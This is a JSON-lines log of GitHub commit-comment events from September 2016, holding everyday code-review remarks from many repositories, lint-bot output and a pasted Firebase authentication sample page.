{"id":"4550347180","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18987448,"position":null,"line":null,"path":null,"commit_id":"ac22efcbf0eb13d5963fc20a3ca916dbca0272ca","created_at":"2016-09-12T16:23:42Z","updated_at":"2016-09-12T16:23:42Z","body":"OK: tested in token + register : seems to work."}},"created_at":"2016-09-12T16:23:42Z"}
{"id":"4550353650","type":"CommitCommentEvent","actor":{"login":"VanDalkvist"},"repo":{"name":"angular-learning/project-tracker"},"payload":{"comment":{"id":18987458,"position":5,"line":3,"path":"public/app/app.main.controller.js","commit_id":"aa80cfbc59420a314498ff51e01d26e1af5ad76a","created_at":"2016-09-12T16:24:53Z","updated_at":"2016-09-12T16:24:53Z","body":"What for here is the \"app\" prefix?"}},"created_at":"2016-09-12T16:24:53Z"}
{"id":"4550362201","type":"CommitCommentEvent","actor":{"login":"pawelkaczor"},"repo":{"name":"strongtyped/fun-cqrs"},"payload":{"comment":{"id":18987472,"position":55,"line":205,"path":"modules/akka/src/main/scala/io/funcqrs/akka/AggregateActor.scala","commit_id":"7dcc60f85b61a9e0cdf2ae709e7bf1105f938dca","created_at":"2016-09-12T16:26:28Z","updated_at":"2016-09-12T16:26:28Z","body":"but at the moment, the events are not yet persisted (this code should be moved to persistAll callback?)"}},"created_at":"2016-09-12T16:26:28Z"}
{"id":"4550369484","type":"CommitCommentEvent","actor":{"login":"jamadden"},"repo":{"name":"zopefoundation/ZODB"},"payload":{"comment":{"id":18987481,"position":6,"line":641,"path":"src/ZODB/DB.py","commit_id":"ca9939ebcccd9734280c2aa2e76319ef63e5fb0d","created_at":"2016-09-12T16:27:49Z","updated_at":"2016-09-12T16:27:49Z","body":"It does cause test pain, yes. At least a dozen failures in the main ZODB test suite, and probably some in RelStorage too."}},"created_at":"2016-09-12T16:27:49Z"}
{"id":"4550370430","type":"CommitCommentEvent","actor":{"login":"tobiasjakobi"},"repo":{"name":"mpv-player/mpv"},"payload":{"comment":{"id":18987484,"position":null,"line":null,"path":null,"commit_id":"c15764101943e93ea9e8223596d8a6a2571494c3","created_at":"2016-09-12T16:28:00Z","updated_at":"2016-09-12T16:28:00Z","body":"Right, thanks for the heads up!"}},"created_at":"2016-09-12T16:28:00Z"}
{"id":"4550370464","type":"CommitCommentEvent","actor":{"login":"admish"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":18987485,"position":null,"line":null,"path":null,"commit_id":"ae37fa2bc598301c69688c78a9adb0e270ad66ef","created_at":"2016-09-12T16:28:00Z","updated_at":"2016-09-12T16:28:00Z","body":"On the mirror."}},"created_at":"2016-09-12T16:28:00Z"}
{"id":"4550373136","type":"CommitCommentEvent","actor":{"login":"VanDalkvist"},"repo":{"name":"angular-learning/project-tracker"},"payload":{"comment":{"id":18987492,"position":5,"line":3,"path":"public/tasks/tasks-list.directive.js","commit_id":"aa80cfbc59420a314498ff51e01d26e1af5ad76a","created_at":"2016-09-12T16:28:30Z","updated_at":"2016-09-12T16:28:30Z","body":"Here you shouldn't use tasks in plural. Just \"ptTaskList\""}},"created_at":"2016-09-12T16:28:30Z"}
{"id":"4550373759","type":"CommitCommentEvent","actor":{"login":"Muqsit"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18987495,"position":null,"line":null,"path":null,"commit_id":"049aded7c4abfab7f4bef666f93253fbaa3b9021","created_at":"2016-09-12T16:28:37Z","updated_at":"2016-09-12T16:28:37Z","body":"getTotalXp() always returns 0 because $totalxp didn't have any interference."}},"created_at":"2016-09-12T16:28:37Z"}
{"id":"4550375007","type":"CommitCommentEvent","actor":{"login":"stapelberg"},"repo":{"name":"i3/i3"},"payload":{"comment":{"id":18987500,"position":68,"line":118,"path":"testcases/t/264-keypress-numlock.t","commit_id":"0469716fd6cbe22916b1f7a0cc8193f6025e8405","created_at":"2016-09-12T16:28:51Z","updated_at":"2016-09-12T16:28:51Z","body":"commit b00d36fca5839094c3a1ce48ab788fe3e2da67d0 already fixes this"}},"created_at":"2016-09-12T16:28:51Z"}
{"id":"4550375133","type":"CommitCommentEvent","actor":{"login":"petermax2"},"repo":{"name":"ElektraInitiative/libelektra"},"payload":{"comment":{"id":18987501,"position":17,"line":373,"path":"src/plugins/crypto/gpg.c","commit_id":"d5f4a028da86b990351685eeb19a0aac3f61a99e","created_at":"2016-09-12T16:28:52Z","updated_at":"2016-09-12T16:28:52Z","body":"Yes, I used `87` throughout the crypto plugin and I wanted to be consistent with the rest of the plugin."}},"created_at":"2016-09-12T16:28:52Z"}
{"id":"4550375195","type":"CommitCommentEvent","actor":{"login":"stapelberg"},"repo":{"name":"i3/i3"},"payload":{"comment":{"id":18987502,"position":92,"line":162,"path":"testcases/t/264-keypress-numlock.t","commit_id":"0469716fd6cbe22916b1f7a0cc8193f6025e8405","created_at":"2016-09-12T16:28:53Z","updated_at":"2016-09-12T16:28:53Z","body":"commit b00d36fca5839094c3a1ce48ab788fe3e2da67d0 already fixes this"}},"created_at":"2016-09-12T16:28:53Z"}
{"id":"4550376407","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"jackwasey/icd"},"payload":{"comment":{"id":18987506,"position":null,"line":null,"path":null,"commit_id":"7f7bdd0956ab5105281588b6b877e0a455ca6ede","created_at":"2016-09-12T16:29:08Z","updated_at":"2016-09-12T16:29:08Z","body":"[R/parse-rtf.R:164:47:](https://github.com/jackwasey/icd/blob/7f7bdd0956ab5105281588b6b877e0a455ca6ede/R/parse-rtf.R#L164) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​  for (categ in fourth_digit_zero_categories) { #\"657\" \"672\"\n                                              ^\n```\n[R/parse-rtf.R:244:15:](https://github.com/jackwasey/icd/blob/7f7bdd0956ab5105281588b6b877e0a455ca6ede/R/parse-rtf.R#L244) *style:* **Use <-, not =, for assignment.**\n```r\n​  icd9_majors = icd9_majors[!duplicated(icd9_majors)]\n              ^\n```\n[R/parse-rtf.R:259:23:](https://github.com/jackwasey/icd/blob/7f7bdd0956ab5105281588b6b877e0a455ca6ede/R/parse-rtf.R#L259) *style:* **Commas should always have a space after.**\n```r\n​         value = TRUE,...)\n                      ^\n```\n[R/parse-rtf.R:381:5:](https://github.com/jackwasey/icd/blob/7f7bdd0956ab5105281588b6b877e0a455ca6ede/R/parse-rtf.R#L381) *style:* **Commented code should be removed.**\n```r\n​  # re_fifth_range_V30V39 <- \"The following two fifths-digits are for use with the fourth-digit \\\\.0\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2016-09-12T16:29:08Z"}
{"id":"4550377305","type":"CommitCommentEvent","actor":{"login":"devemux86"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":18987511,"position":null,"line":null,"path":null,"commit_id":"dbe72926920814881c4bbd9762bc0cc04aab10cc","created_at":"2016-09-12T16:29:18Z","updated_at":"2016-09-12T16:29:18Z","body":"Doesn't that need for users to see how they can use snapshot version?"}},"created_at":"2016-09-12T16:29:18Z"}
{"id":"4550379288","type":"CommitCommentEvent","actor":{"login":"VanDalkvist"},"repo":{"name":"angular-learning/project-tracker"},"payload":{"comment":{"id":18987521,"position":30,"line":33,"path":"public/tasks/tasks-list.directive.js","commit_id":"aa80cfbc59420a314498ff51e01d26e1af5ad76a","created_at":"2016-09-12T16:29:40Z","updated_at":"2016-09-12T16:29:40Z","body":"Don't use `directive` keyword in templates name"}},"created_at":"2016-09-12T16:29:40Z"}
{"id":"4550382245","type":"CommitCommentEvent","actor":{"login":"dtolnay"},"repo":{"name":"dtolnay/syn"},"payload":{"comment":{"id":18987536,"position":null,"line":null,"path":null,"commit_id":"1521119acf7bf35aa976dc4a7559733451731aac","created_at":"2016-09-12T16:30:16Z","updated_at":"2016-09-12T16:30:16Z","body":"@White-Oak There is a link at the top that says \"rustdoc\". Would it be clearer in a different color or should I make it a text link?"}},"created_at":"2016-09-12T16:30:16Z"}
{"id":"4550387076","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"psylone/train_manager"},"payload":{"comment":{"id":18987544,"position":4,"line":10,"path":"app/views/layouts/application.html.erb","commit_id":"630a756dc2f91d691eca016aa229732bccbab196","created_at":"2016-09-12T16:31:07Z","updated_at":"2016-09-12T16:31:07Z","body":"Хэлер и Футер тоже можно было вынести во фрагменты: `<%= render('layout/header') %>`."}},"created_at":"2016-09-12T16:31:07Z"}
{"id":"4550389006","type":"CommitCommentEvent","actor":{"login":"MichMich"},"repo":{"name":"MichMich/MagicMirror"},"payload":{"comment":{"id":18987548,"position":null,"line":null,"path":null,"commit_id":"ae37fa2bc598301c69688c78a9adb0e270ad66ef","created_at":"2016-09-12T16:31:27Z","updated_at":"2016-09-12T16:31:27Z","body":"In that case Please check what the feed says to find out if its a Mirror issue or feed issue. "}},"created_at":"2016-09-12T16:31:27Z"}
{"id":"4550391763","type":"CommitCommentEvent","actor":{"login":"vermiculus"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":18987553,"position":4,"line":2216,"path":"ivy.el","commit_id":"9b13aa466e3370b52e536c7c1a290d924d488ee9","created_at":"2016-09-12T16:31:57Z","updated_at":"2016-09-12T16:31:57Z","body":"Ahh, that makes sense 😄 "}},"created_at":"2016-09-12T16:31:57Z"}
{"id":"4550393481","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18987558,"position":5,"line":58,"path":".github/ISSUE_TEMPLATE_tmpl.md","commit_id":"546edb2efabb18f9eb0eecb2f8719fcb777e99a7","created_at":"2016-09-12T16:32:15Z","updated_at":"2016-09-12T16:32:15Z","body":"Fixed in fcba157e8049350c5386cc3b850626320d9ff7eb."}},"created_at":"2016-09-12T16:32:15Z"}
{"id":"4550395653","type":"CommitCommentEvent","actor":{"login":"hbushouse"},"repo":{"name":"STScI-JWST/jwst"},"payload":{"comment":{"id":18987564,"position":5,"line":329,"path":"jwst/assign_wcs/nirspec.py","commit_id":"7588668b44b77486cdafb35f7e2eb2dcfa7d1b63","created_at":"2016-09-12T16:32:36Z","updated_at":"2016-09-12T16:32:36Z","body":"Right? It would be so much easier if the table had a column called 'source' that was set to 'Y' for the \"main\" shutter and 'N' for all the background shutters.\r\n\r\nSpeaking of which, how does the current scheme handle slitlets that are composed of all background shutters, i.e. there's no individual shutter with background='N'? Background slitlets can exist."}},"created_at":"2016-09-12T16:32:36Z"}
{"id":"4550395841","type":"CommitCommentEvent","actor":{"login":"alpinho"},"repo":{"name":"mrahim/pypreprocess"},"payload":{"comment":{"id":18987565,"position":null,"line":null,"path":null,"commit_id":"ee555d3b81e7b4ae23e5b1fd52bb5fe4dd47ca25","created_at":"2016-09-12T16:32:39Z","updated_at":"2016-09-12T16:32:39Z","body":"Coooool! It is @AlexandreAbraham's logo, as well."}},"created_at":"2016-09-12T16:32:39Z"}
{"id":"4550398904","type":"CommitCommentEvent","actor":{"login":"BenjGue"},"repo":{"name":"BenjGue/phenix"},"payload":{"comment":{"id":18987577,"position":null,"line":null,"path":null,"commit_id":"babe9d17d518bf13901e784c14353305f9ad9078","created_at":"2016-09-12T16:33:13Z","updated_at":"2016-09-12T16:33:13Z","body":"aze"}},"created_at":"2016-09-12T16:33:13Z"}
{"id":"4550401944","type":"CommitCommentEvent","actor":{"login":"raulpana"},"repo":{"name":"raulpana/hello-world"},"payload":{"comment":{"id":18987583,"position":null,"line":null,"path":null,"commit_id":"edf5c9f7edcd66702774cfc1b4d4a8cb9f824d0d","created_at":"2016-09-12T16:33:44Z","updated_at":"2016-09-12T16:33:44Z","body":"<!DOCTYPE html>\r\n<!--\r\nCopyright (c) 2016 Google Inc.\r\nLicensed under the Apache License, Version 2.0 (the \"License\");\r\nyou may not use this file except in compliance with the License.\r\nYou may obtain a copy of the License at\r\nhttp://www.apache.org/licenses/LICENSE-2.0\r\nUnless required by applicable law or agreed to in writing, software\r\ndistributed under the License is distributed on an \"AS IS\" BASIS,\r\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\nSee the License for the specific language governing permissions and\r\nlimitations under the License.\r\n-->\r\n<html>\r\n<head>\r\n  <meta charset=utf-8 />\r\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n  <title>Email/Password Authentication Example</title>\r\n\r\n  <!-- Material Design Theming -->\r\n  <link rel=\"stylesheet\" href=\"https://code.getmdl.io/1.1.3/material.orange-indigo.min.css\">\r\n  <link rel=\"stylesheet\" href=\"https://fonts.googleapis.com/icon?family=Material+Icons\">\r\n  <script defer src=\"https://code.getmdl.io/1.1.3/material.min.js\"></script>\r\n\r\n  <link rel=\"stylesheet\" href=\"main.css\">\r\n\r\n  <!-- Firebase -->\r\n  <!-- ***********************************************************************************************************************\r\n       * TODO(DEVELOPER): Paste the initialization snippet from: Firebase Console > Overview > Add Firebase to your web app. *\r\n       *********************************************************************************************************************** -->\r\n\r\n  <script type=\"text/javascript\">\r\n    /**\r\n     * Handles the sign in button press.\r\n     */\r\n    function toggleSignIn() {\r\n      if (firebase.auth().currentUser) {\r\n        // [START signout]\r\n        firebase.auth().signOut();\r\n        // [END signout]\r\n      } else {\r\n        var email = document.getElementById('email').value;\r\n        var password = document.getElementById('password').value;\r\n        if (email.length < 4) {\r\n          alert('Please enter an email address.');\r\n          return;\r\n        }\r\n        if (password.length < 4) {\r\n          alert('Please enter a password.');\r\n          return;\r\n        }\r\n        // Sign in with email and pass.\r\n        // [START authwithemail]\r\n        firebase.auth().signInWithEmailAndPassword(email, password).catch(function(error) {\r\n          // Handle Errors here.\r\n          var errorCode = error.code;\r\n          var errorMessage = error.message;\r\n          // [START_EXCLUDE]\r\n          if (errorCode === 'auth/wrong-password') {\r\n            alert('Wrong password.');\r\n          } else {\r\n            console.error(error);\r\n          }\r\n          // [END_EXCLUDE]\r\n        });\r\n        // [END authwithemail]\r\n      }\r\n      document.getElementById('quickstart-sign-in').disabled = true;\r\n    }\r\n    function handleSignUp() {\r\n      var email = document.getElementById('email').value;\r\n      var password = document.getElementById('password').value;\r\n      if (email.length < 4) {\r\n        alert('Please enter an email address.');\r\n        return;\r\n      }\r\n      if (password.length < 4) {\r\n        alert('Please enter a password.');\r\n        return;\r\n      }\r\n      // Sign in with email and pass.\r\n      // [START createwithemail]\r\n      firebase.auth().createUserWithEmailAndPassword(email, password).catch(function(error) {\r\n        // Handle Errors here.\r\n        var errorCode = error.code;\r\n        var errorMessage = error.message;\r\n        // [START_EXCLUDE]\r\n        if (errorCode == 'auth/weak-password') {\r\n          alert('The password is too weak.');\r\n        } else {\r\n          console.error(error);\r\n        }\r\n        // [END_EXCLUDE]\r\n      });\r\n      // [END createwithemail]\r\n    }\r\n    /**\r\n     * Handles registering callbacks for the auth status.\r\n     *\r\n     * This method registers a listener with firebase.auth().onAuthStateChanged. This listener is called when\r\n     * the user is signed in or out, and that is where we update the UI.\r\n     *\r\n     * When signed in, we also authenticate to the Firebase Realtime Database.\r\n     */\r\n    function initApp() {\r\n      // Listening for auth state changes.\r\n      // [START authstatelistener]\r\n      firebase.auth().onAuthStateChanged(function(user) {\r\n        if (user) {\r\n          // User is signed in.\r\n          var displayName = user.displayName;\r\n          var email = user.email;\r\n          var emailVerified = user.emailVerified;\r\n          var photoURL = user.photoURL;\r\n          var isAnonymous = user.isAnonymous;\r\n          var uid = user.uid;\r\n          var refreshToken = user.refreshToken;\r\n          var providerData = user.providerData;\r\n          // [START_EXCLUDE silent]\r\n          document.getElementById('quickstart-sign-in-status').textContent = 'Signed in';\r\n          document.getElementById('quickstart-sign-in').textContent = 'Sign out';\r\n          document.getElementById('quickstart-account-details').textContent = JSON.stringify({\r\n            displayName: displayName,\r\n            email: email,\r\n            emailVerified: emailVerified,\r\n            photoURL: photoURL,\r\n            isAnonymous: isAnonymous,\r\n            uid: uid,\r\n            refreshToken: refreshToken,\r\n            providerData: providerData\r\n          }, null, '  ');\r\n          // [END_EXCLUDE]\r\n        } else {\r\n          // User is signed out.\r\n          // [START_EXCLUDE silent]\r\n          document.getElementById('quickstart-sign-in-status').textContent = 'Signed out';\r\n          document.getElementById('quickstart-sign-in').textContent = 'Sign in';\r\n          document.getElementById('quickstart-account-details').textContent = 'null';\r\n          // [END_EXCLUDE]\r\n        }\r\n        // [START_EXCLUDE silent]\r\n        document.getElementById('quickstart-sign-in').disabled = false;\r\n        // [END_EXCLUDE]\r\n      });\r\n      // [END authstatelistener]\r\n      document.getElementById('quickstart-sign-in').addEventListener('click', toggleSignIn, false);\r\n      document.getElementById('quickstart-sign-up').addEventListener('click', handleSignUp, false);\r\n    }\r\n    window.onload = function() {\r\n      initApp();\r\n    };\r\n  </script>\r\n</head>\r\n<body>\r\n<div class=\"demo-layout mdl-layout mdl-js-layout mdl-layout--fixed-header\">\r\n\r\n  <!-- Header section containing title -->\r\n  <header class=\"mdl-layout__header mdl-color-text--white mdl-color--light-blue-700\">\r\n    <div class=\"mdl-cell mdl-cell--12-col mdl-cell--12-col-tablet mdl-grid\">\r\n      <div class=\"mdl-layout__header-row mdl-cell mdl-cell--12-col mdl-cell--12-col-tablet mdl-cell--8-col-desktop\">\r\n        <a href=\"/\"><h3>Firebase Authentication</h3></a>\r\n      </div>\r\n    </div>\r\n  </header>\r\n\r\n  <main class=\"mdl-layout__content mdl-color--grey-100\">\r\n    <div class=\"mdl-cell mdl-cell--12-col mdl-cell--12-col-tablet mdl-grid\">\r\n\r\n      <!-- Container for the demo -->\r\n      <div class=\"mdl-card mdl-shadow--2dp mdl-cell mdl-cell--12-col mdl-cell--12-col-tablet mdl-cell--12-col-desktop\">\r\n        <div class=\"mdl-card__title mdl-color--light-blue-600 mdl-color-text--white\">\r\n          <h2 class=\"mdl-card__title-text\">Firebase Email &amp; Password Authentication</h2>\r\n        </div>\r\n        <div class=\"mdl-card__supporting-text mdl-color-text--grey-600\">\r\n          <p>Enter an email and password below and either sign in to an existing account or sign up</p>\r\n\r\n          <input class=\"mdl-textfield__input\" style=\"display:inline;width:auto;\" type=\"text\" id=\"email\" name=\"email\" placeholder=\"Email\"/>\r\n          &nbsp;&nbsp;&nbsp;\r\n          <input class=\"mdl-textfield__input\" style=\"display:inline;width:auto;\" type=\"password\" id=\"password\" name=\"password\" placeholder=\"Password\"/>\r\n          <br/><br/>\r\n          <button disabled class=\"mdl-button mdl-js-button mdl-button--raised\" id=\"quickstart-sign-in\" name=\"signin\">Sign In</button>\r\n          &nbsp;&nbsp;&nbsp;\r\n          <button class=\"mdl-button mdl-js-button mdl-button--raised\" id=\"quickstart-sign-up\" name=\"signup\">Sign Up</button>\r\n\r\n          <!-- Container where we'll display the user details -->\r\n          <div class=\"quickstart-user-details-container\">\r\n            Firebase sign-in status: <span id=\"quickstart-sign-in-status\">Unknown</span>\r\n            <div>Firebase auth <code>currentUser</code> object value:</div>\r\n            <pre><code id=\"quickstart-account-details\">null</code></pre>\r\n          </div>\r\n        </div>\r\n      </div>\r\n\r\n    </div>\r\n  </main>\r\n</div>\r\n</body>\r\n</html> #"}},"created_at":"2016-09-12T16:33:44Z"}
{"id":"4550403189","type":"CommitCommentEvent","actor":{"login":"raulpana"},"repo":{"name":"raulpana/hello-world"},"payload":{"comment":{"id":18987588,"position":null,"line":null,"path":null,"commit_id":"edf5c9f7edcd66702774cfc1b4d4a8cb9f824d0d","created_at":"2016-09-12T16:33:58Z","updated_at":"2016-09-12T16:33:58Z","body":"no entiendo nada"}},"created_at":"2016-09-12T16:33:58Z"}
{"id":"4550404261","type":"CommitCommentEvent","actor":{"login":"White-Oak"},"repo":{"name":"dtolnay/syn"},"payload":{"comment":{"id":18987594,"position":null,"line":null,"path":null,"commit_id":"1521119acf7bf35aa976dc4a7559733451731aac","created_at":"2016-09-12T16:34:12Z","updated_at":"2016-09-12T16:34:12Z","body":"@dtolnay, whoops, sorry, my bad!"}},"created_at":"2016-09-12T16:34:12Z"}
{"id":"4550404647","type":"CommitCommentEvent","actor":{"login":"Vol-2016"},"repo":{"name":"nikisby/periscope.tv"},"payload":{"comment":{"id":18987596,"position":null,"line":null,"path":null,"commit_id":"b125d6b89b5f7d36bc36d4c238e2eb1bf7b86bfc","created_at":"2016-09-12T16:34:15Z","updated_at":"2016-09-12T16:34:15Z","body":"Привет nikisby, \r\nкак насчет того, чтоб добавить в скрипт и загрузку чата?"}},"created_at":"2016-09-12T16:34:15Z"}
{"id":"4550404738","type":"CommitCommentEvent","actor":{"login":"SunnySunny93"},"repo":{"name":"SunnySunny93/Projekt1"},"payload":{"comment":{"id":18987598,"position":null,"line":null,"path":null,"commit_id":"77e87e9559de1df311536b4be13ca85d543ec4f1","created_at":"2016-09-12T16:34:16Z","updated_at":"2016-09-12T16:34:16Z","body":"ich habe für eine gruppe eine datei erstellt wenn ich diese öffters brauche. sonst nur für die views"}},"created_at":"2016-09-12T16:34:16Z"}
{"id":"4550405798","type":"CommitCommentEvent","actor":{"login":"Ralf9"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":18987599,"position":5,"line":22,"path":"FHEM/14_SD_WS.pm","commit_id":"7c15b54258fef1bb0139322c5804e9fccd873c77","created_at":"2016-09-12T16:34:28Z","updated_at":"2016-09-12T16:34:28Z","body":"Ja, der Fehler ist jetzt weg. \r\nDieses Problem\r\nhttps://forum.fhem.de/index.php/topic,39451.msg471620.html#msg471620\r\nbesteht aber immer noch.\r\nIch denke, am saubersten wäre es, wenn das SD_WS Modul nur bei den Protokollen aufgerufen wird die es auch bearbeitet.\r\n\r\n```\r\n2016.09.12 18:15:46.359 5: sduinoD dispatch P9#FE8789A0C82438254431C0\r\n2016.09.12 18:15:46.359 4: SD_WS_Parse: Protocol: 9, rawData: FE8789A0C82438254431C0\r\n2016.09.12 18:15:46.359 4: SD_WS_Parse_unknown: converted to bits: 1111111010000111100010011010000011001000001001000011100000100101010001000011000111000000\r\n```"}},"created_at":"2016-09-12T16:34:28Z"}
{"id":"4550406892","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-android"},"payload":{"comment":{"id":18987602,"position":null,"line":null,"path":null,"commit_id":"59b9b73c651d607e6416c5283d2f6812a469b5c4","created_at":"2016-09-12T16:34:39Z","updated_at":"2016-09-12T16:34:39Z","body":"++"}},"created_at":"2016-09-12T16:34:39Z"}
{"id":"4550409325","type":"CommitCommentEvent","actor":{"login":"annulen"},"repo":{"name":"annulen/webkit"},"payload":{"comment":{"id":18987609,"position":8,"line":37,"path":"Source/WebKit/qt/WebCoreSupport/FrameLoaderClientQt.h","commit_id":"a5f5622479260628f7f246a6d707554920cca48f","created_at":"2016-09-12T16:35:06Z","updated_at":"2016-09-12T16:35:06Z","body":"I can easily believe that `PassRefPtr<FormState>` does not compile without `#include \"FormState.h\"`, but other headers are surely excessive, and should be included to respective `.cpp` file(s)"}},"created_at":"2016-09-12T16:35:06Z"}
{"id":"4550413172","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18987621,"position":null,"line":null,"path":null,"commit_id":"049aded7c4abfab7f4bef666f93253fbaa3b9021","created_at":"2016-09-12T16:35:47Z","updated_at":"2016-09-12T16:35:47Z","body":"Shit, seems I forgot that. Will fix."}},"created_at":"2016-09-12T16:35:47Z"}
{"id":"4550413510","type":"CommitCommentEvent","actor":{"login":"nden"},"repo":{"name":"STScI-JWST/jwst"},"payload":{"comment":{"id":18987622,"position":5,"line":329,"path":"jwst/assign_wcs/nirspec.py","commit_id":"7588668b44b77486cdafb35f7e2eb2dcfa7d1b63","created_at":"2016-09-12T16:35:51Z","updated_at":"2016-09-12T16:35:51Z","body":"I think (Craig can correct me) we exclude them from the WCS. Should we include them?"}},"created_at":"2016-09-12T16:35:51Z"}
{"id":"4550416289","type":"CommitCommentEvent","actor":{"login":"allasm"},"repo":{"name":"phenotips/phenotips"},"payload":{"comment":{"id":18987638,"position":193,"line":226,"path":"components/family-studies/api/src/main/java/org/phenotips/studies/family/internal/PhenotipsFamilyPermissions.java","commit_id":"a77b3a211b232a33f54e6517bd2b0b5968627c9a","created_at":"2016-09-12T16:36:20Z","updated_at":"2016-09-12T16:36:20Z","body":"We do not, forgot to remove a debug line"}},"created_at":"2016-09-12T16:36:20Z"}
{"id":"4550420764","type":"CommitCommentEvent","actor":{"login":"Mithumathew"},"repo":{"name":"Mithumathew/mithumathew.github.io"},"payload":{"comment":{"id":18987649,"position":2,"line":2,"path":"index.html","commit_id":"84c6164d672b9c0e5fb76e8f6b775341860aac26","created_at":"2016-09-12T16:37:10Z","updated_at":"2016-09-12T16:37:10Z","body":"sweet and savory"}},"created_at":"2016-09-12T16:37:10Z"}
{"id":"4550424284","type":"CommitCommentEvent","actor":{"login":"racardoso"},"repo":{"name":"PPC64/hhvm"},"payload":{"comment":{"id":18987659,"position":8,"line":147,"path":"hphp/hack/src/heap/hh_shared.c","commit_id":"da73c736615fc493bf89c022e7fa8adb37b95bca","created_at":"2016-09-12T16:37:48Z","updated_at":"2016-09-12T16:37:48Z","body":"`SYS_memfd_create` is a wrapper around `__NR_memfd_create`. The all point of declare a `SYS_memfd_create` is to use the syscall number instead rely on macro declared in a include file. I disagree with this but, the FB people insist on this when i made the pull request. The original patch only changes the line:\r\n\r\n`return syscall(319, name, flags);` to `return syscall(__NR_memfd_create, name, flags);`"}},"created_at":"2016-09-12T16:37:48Z"}
{"id":"4550425306","type":"CommitCommentEvent","actor":{"login":"DroidThug"},"repo":{"name":"charansai612/android_device_twrp_tree_lettuce"},"payload":{"comment":{"id":18987661,"position":null,"line":null,"path":null,"commit_id":"7e2d92f8700aabc3bb315d48472ee7f8ff113921","created_at":"2016-09-12T16:38:01Z","updated_at":"2016-09-12T16:38:01Z","body":":)"}},"created_at":"2016-09-12T16:38:01Z"}
{"id":"4550425487","type":"CommitCommentEvent","actor":{"login":"rohit21agrawal"},"repo":{"name":"NuGet/NuGet.Client"},"payload":{"comment":{"id":18987663,"position":106,"line":106,"path":"src/NuGet.Core/NuGet.Build.Tasks.Pack/Pack.targets","commit_id":"9b899f5542d51507520eb358bdc1e5c325b57576","created_at":"2016-09-12T16:38:03Z","updated_at":"2016-09-12T16:38:03Z","body":"@kzu This target is temporary until the Cross Targeting design gets finalized."}},"created_at":"2016-09-12T16:38:03Z"}
{"id":"4550426797","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":18987666,"position":null,"line":null,"path":null,"commit_id":"12e7ffbd8e107fcfb86c36e91ed4d1ed854855f3","created_at":"2016-09-12T16:38:17Z","updated_at":"2016-09-12T16:38:17Z","body":"that's some strange code removed :)"}},"created_at":"2016-09-12T16:38:17Z"}
{"id":"4550427130","type":"CommitCommentEvent","actor":{"login":"topherfangio"},"repo":{"name":"angular/material"},"payload":{"comment":{"id":18987667,"position":null,"line":null,"path":null,"commit_id":"314aae1c345635f3ec1f67c842a38e19ee49b01e","created_at":"2016-09-12T16:38:20Z","updated_at":"2016-09-12T16:38:20Z","body":"@wnwnzhou I'll be looking into this soon."}},"created_at":"2016-09-12T16:38:20Z"}
{"id":"4550429516","type":"CommitCommentEvent","actor":{"login":"vinshanks"},"repo":{"name":"vinshanks/tshop"},"payload":{"comment":{"id":18987676,"position":null,"line":null,"path":null,"commit_id":"a7ea0e4549efaded70c7c71a5b2623acacdb9e13","created_at":"2016-09-12T16:38:45Z","updated_at":"2016-09-12T16:38:45Z","body":"this is a test"}},"created_at":"2016-09-12T16:38:45Z"}
{"id":"4550434399","type":"CommitCommentEvent","actor":{"login":"oleg-nenashev"},"repo":{"name":"Holmistr/database-sqlite"},"payload":{"comment":{"id":18987694,"position":null,"line":null,"path":null,"commit_id":"ed223ef2c527aacb9ad54ba312c565b5be1ba578","created_at":"2016-09-12T16:39:42Z","updated_at":"2016-09-12T16:39:42Z","body":"I advice to use the latest version of the parent POM (2.14 IIRC).\r\nIt just picks some fixes and version upgrades"}},"created_at":"2016-09-12T16:39:42Z"}
{"id":"4550435119","type":"CommitCommentEvent","actor":{"login":"vinshanks"},"repo":{"name":"vinshanks/tshop"},"payload":{"comment":{"id":18987700,"position":null,"line":null,"path":null,"commit_id":"a7ea0e4549efaded70c7c71a5b2623acacdb9e13","created_at":"2016-09-12T16:39:50Z","updated_at":"2016-09-12T16:39:50Z","body":"<?php\necho ss;\n\n?>"}},"created_at":"2016-09-12T16:39:50Z"}
{"id":"4550438975","type":"CommitCommentEvent","actor":{"login":"asr"},"repo":{"name":"agda/agda"},"payload":{"comment":{"id":18987712,"position":null,"line":null,"path":null,"commit_id":"04981808ea6720b24b91322cc4ad8568b14321b0","created_at":"2016-09-12T16:40:32Z","updated_at":"2016-09-12T16:40:32Z","body":"Because `toRational (0.0 :: Double)` is equal to `toRational (-0.0 :: Double)`, it seems the problem is in the use of `toRational` in \r\n\r\n```haskell\r\nhslit :: Literal -> HS.Literal\r\nhslit l = case l of LitNat    _ x -> HS.Int    x\r\n                    LitFloat  _ x -> HS.Frac   (toRational x)\r\n                    LitChar   _ x -> HS.Char   x\r\n                    LitQName  _ x -> __IMPOSSIBLE__\r\n                    LitString _ _ -> __IMPOSSIBLE__\r\n                    LitMeta{}     -> __IMPOSSIBLE__\r\n```\r\n\r\nfrom `Agda.Compiler.MAlonzo.Compiler`.\r\n\r\nTesting..."}},"created_at":"2016-09-12T16:40:32Z"}
